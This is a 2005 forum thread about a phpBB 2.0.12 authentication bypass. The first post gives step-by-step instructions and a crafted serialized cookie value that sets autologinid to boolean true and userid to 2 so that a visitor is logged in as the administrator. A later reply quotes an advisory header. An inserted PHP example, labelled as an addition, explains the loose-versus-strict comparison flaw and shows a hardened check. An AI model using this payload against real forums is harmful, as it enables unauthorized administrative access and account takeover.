Clan x86

Technical (Development, Security, etc.) => General Security Information => Topic started by: Networks on March 25, 2005, 06:30:54 pm

Title: phpBB Bug (Again...)
Post by: Networks on March 25, 2005, 06:30:54 pm
Quote
Ok, now let's get to it. Here is what you will need:
-Preferably a Mozilla client, such as Firefox
-LiveHTTP Headers plugin for Firefox Here

Ok, the way this exploit works is because in phpBB's session file, it utilizes a == instead of a === on autocheckid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am surprised it wasn't found earlier.

Howto:
Go to a forum, for example phpBB.com, open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot

In the packet will be the following data:
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D


On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

and then click "reload".

After the page has reloaded you should be logged in as user number 2, which is usually the administrator's ID number.

I myself have tried it several times, I have not succeeded in getting an admin status so blah.

Edit: PHPBB 2.0.12 Exploit (That may be why)
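
The == versus === point in the post above, shown as an added example that is not part of the original post and is not phpBB's source: a loose comparison accepts a client-supplied boolean, while a type check plus strict comparison rejects it. The function names and the stored key are hypothetical; the first cookie value is the one quoted in the post, the other two are constructed.

```php
<?php
// Added illustration, not phpBB source. Function names and the key are hypothetical.

// Constructed stand-in for the auto-login key the server holds for a user.
const STORED_KEY = 'constructed-autologin-key-for-user-2';

// Vulnerable pattern: loose comparison on a value whose type the client controls.
function check_loose($sessiondata): bool
{
    // bool == string casts the string to bool, so true == 'any non-empty string'.
    return isset($sessiondata['autologinid'])
        && $sessiondata['autologinid'] == STORED_KEY;
}

// Hardened pattern: require a string first, then compare in constant time.
function check_strict($sessiondata): bool
{
    return is_array($sessiondata)
        && isset($sessiondata['autologinid'])
        && is_string($sessiondata['autologinid'])
        && hash_equals(STORED_KEY, $sessiondata['autologinid']);
}

$cookies = [
    // Value quoted in the post: autologinid is serialized as b:1 (boolean true).
    'from post'       => 'a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D',
    // Constructed: what a legitimate client holding the real key would send.
    'constructed ok'  => urlencode(serialize(['autologinid' => STORED_KEY, 'userid' => '2'])),
    // Constructed: a string that does not match the stored key.
    'constructed bad' => urlencode(serialize(['autologinid' => 'wrong-key', 'userid' => '2'])),
];

foreach ($cookies as $label => $raw) {
    // allowed_classes => false (PHP 7+) prevents object creation while unserializing.
    $data = unserialize(urldecode($raw), ['allowed_classes' => false]);
    printf("%-16s type=%-8s loose=%-5s strict=%s\n",
        $label,
        gettype($data['autologinid']),
        var_export(check_loose($data), true),
        var_export(check_strict($data), true));
}
```

Only the loose check accepts the boolean from the post's cookie; both checks accept the matching string and reject the wrong one.
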
Title: Re: phpBB Bug (Again...)
Post by: iago on March 25, 2005, 06:33:08 pm
Eww @ not giving credit :P

------------------------------------------------------------------------
# phpBB 2.0.13 failure to reset user level after failed exploit
# discovered By : tOnk3r
# e-mail : m[at]spywire[dot]net
# date : 22-march-05
# shouts: pureone, spywire.net crew , and everybody i know!
# Versions affected : ALL versions upto and including 2.0.13
# status : vendor notified (phpbb)
------------------------------------------------------------------------

Hopefully they fix that fast :-o
Title: Re: phpBB Bug (Again...)
Post by: Quik on March 25, 2005, 06:39:55 pm
It's quite ridiculous: I've seen so many phpBB exploits on BugTraq mailing list, it's a wonder anyone uses that software.
Title: Re: phpBB Bug (Again...)
Post by: Newby on March 25, 2005, 06:43:37 pm
SMF for life!
Title: Re: phpBB Bug (Again...)
Post by: Networks on March 26, 2005, 01:46:41 am
Quote
SMF for life!

Wrong, Invision for life!